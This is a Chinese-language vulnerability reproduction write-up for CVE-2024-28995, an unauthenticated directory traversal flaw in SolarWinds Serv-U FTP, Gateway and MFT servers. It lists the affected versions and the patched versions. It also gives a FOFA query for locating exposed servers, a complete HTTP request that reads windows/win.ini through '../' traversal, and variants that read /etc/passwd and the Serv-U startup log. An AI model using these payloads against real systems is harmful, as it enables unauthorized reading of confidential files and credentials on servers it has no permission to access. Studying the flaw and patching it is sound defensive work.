SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)
1.漏洞描述
SolarWinds 是一家提供广泛的 IT 管理和网络管理软件解决方案的公司。SolarWinds 的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-U 是 SolarWinds 提供的一款 FTP(文件传输协议)服务器软件,它允许用户在 Windows 、Linux 系统上设置和管理 FTP 服务。Serv-U 提供了多种功能,以确保文件传输的安全性、效率和灵活性。
SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。
影响版本
SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1
SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1
SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1
根据官方文档,Serv-U 版本15.3.2
及更早版本将于 2025 年 2 月终止使用,并且低于此版本的所有版本都已终止使用并且不再受支持,使用了所有默认安装选项都受到此漏洞影响。
2.漏洞复现
FOFA:app=“SolarWinds-Serv-U-FTP”
GET /?InternalDir=../../../../../../../../windows&InternalFile=win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
另外:当以 Linux 系统为目标读取任意文件时,如/etc/passwd
路径分隔符必须是反斜杠 ( \
),而不是正斜杠 ( /
),但是目前公网上大部分受影响的产品均为windows系统
/?InternalDir=\..\..\..\..\etc&InternalFile=passwd
/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt
3.漏洞修复
目前官方已有可更新版本,建议 Serv-U 客户尽快应用此修补程序:
SolarWinds Serv-U FTP Server >= 15.4.2 Hotfix 2
SolarWinds Serv-U Gateway >= 15.4.2 Hotfix 2
SolarWinds Serv-U MFT Server >= 15.4.2 Hotfix 2
您可以从此处的供应商处获取有关此修补程序的更多信息:
https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes